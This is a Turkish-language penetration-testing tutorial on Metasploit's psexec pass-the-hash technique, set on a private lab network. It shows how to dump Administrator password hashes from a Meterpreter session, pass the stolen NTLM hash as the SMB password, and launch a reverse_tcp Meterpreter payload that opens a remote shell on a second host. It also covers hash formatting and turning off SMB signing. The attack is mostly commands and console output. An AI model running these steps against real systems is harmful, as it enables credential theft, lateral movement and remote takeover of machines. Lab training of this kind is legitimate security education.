MSF PSEexec Pass the Hash

Estimated read time 5 min read

psexec modülü, genellikle pentest işlemleri esnasında kullanılır. Bu modül sayesine hedef sisteme giriş yapmanız mümkün hale gelmektedir. Alışılmış kullanımda, sistemin kullanıcı adı ve parolasını elde ettiğiniz ve bunu exploit modülüne değişken olarak girmeniz yeterlidir.

Normalde izlenen yol, sistemde meterpreter shell açıldığında fgdumppwdump veya cachedump komutlarıyla parola elde etmektir. Bu aramalar esnasında bulduğunuz hash değerleri olursa, bunları çeşitli araçlar kullanarak çözmeye ve parolaların açık halini elde etmeye çalışırız.

Oysa bazen başka bir durumla karşı karşı kalabilirsiniz. Bir sistemde Administrator yetkili bir oturum açtınız ve kullanıcının hash olarak formatlı parolasını elde ettiniz. Bu oturum açtığınız sistem üzerinden aynı ağda bulunan başka bir sisteme bağlanmak istediğinizde, Administrator kullanıcısının parolasını çözmenize gerek olmayabilir. Genellikle ağdaki cihazlar bu hash değerleri kulanarak haberleşirler. psexec modülü, bulduğunuz hash değerini parola olarak kullanmanıza olanak sağlar.

UYARI-1:

NTLM kullanan sistemde, bulacağınız hash değeri ******NOPASSWORD*******:8846f7eaee8fb117ad06bdd830b7586c formatındaysa, baş taraftaki ******NOPASSWORD******* kısmını 32 adet sıfır ile değiştirerek psexec içine değişken olarak girmeniz gerekir. Yani değer, 00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c şeklinde olmalıdır.

UYARI-2:

Lab ortamında, doğru hash değeri girdiğiniz halde STATUS_ACCESS_DENIED (Command=117 WordCount=0) hatası alıyorsanız, hedef Windows sisteminin Registry ayarlarında HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters içerisinde RequireSecuritySignature değerini 0 olarak ayarlamalısınız.

Hashdump

Aşağıda, bir exploit kullanılarak Meterpreter oturumu açılmıştır ve post/windows/gather/hashdump modülü ile sistemde hash değerleri bulunmak istenmektedir.

[*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1042)

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
meterpreter >

Görüldüğü gibi, RHOST: 192.168.57.131 IP adresinde bulunan Administrator kullanıcısına ait e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c değeri elde edilmiştir.

Şimdi bu hash değerini kullanarak RHOST: 192.168.57.140 IP adresine oturum açmayı deneyelim. Tabii ki önceden yaptığınız taramada aynı ağda 192.168.57.140 IP adresinde ve 445 portunda SMB servisinin çalıştığını keşfettiğinizi kabul ediyoruz.

psexec

Önce msfconsole ile Metasploit Framework başlatalım ve psexec modülünü yükleyelim.

root@kali:~# msfconsole

        ##             ###      ##  ##
 ## ## #### ###### #### #####  #####  ##  ####    ######
####### ## ## ## ##     ## ## ##  ##  ## ##  ###  ##
####### ###### ## #####  #### ## ##  ##  ## ##  ##  ##
## # ##   ## ## ## ## ##   #####  ##  ## ##  ##  ##
##  ## #### ###  #####  #####   ##  ####  ####  #### ###
                   ##


    =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
    =[ svn r14551 updated yesterday (2012.01.14)

msf > search psexec

Exploits
========

  Name            Description
  ----            -----------
  windows/smb/psexec     Microsoft Windows Authenticated User Code Execution
  windows/smb/smb_relay   Microsoft Windows SMB Relay Code Execution

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
LHOST => 192.168.57.133
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.57.140
RHOST => 192.168.57.140
msf exploit(psexec) > show options

Module options:

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  RHOST  192.168.57.140  yes    The target address
  RPORT  445       yes    Set the SMB service port
  SMBPass          no    The password for the specified username
  SMBUser Administrator  yes    The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  EXITFUNC thread      yes    Exit technique: seh, thread, process
  LHOST   192.168.57.133  yes    The local address
  LPORT   443       yes    The local port


Exploit target:

  Id Name
  -- ----
  0  Automatic

SMBPass

Yukarıda görüldüğü gibi exploit/windows/smb/psexec modülünde SMBPass değişkenini girmemiz gerekmektedir. SMBPass değişkenine elimizde bulunan hash değerini girelim ve modülü exploit komutuyla çalıştıralım.

msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \KoVCxCjx.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.140[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.140[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \KoVCxCjx.exe...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.140:445)

meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Gördüğünüz gibi 192.168.57.140 IP adresinde oturum açılmıştır.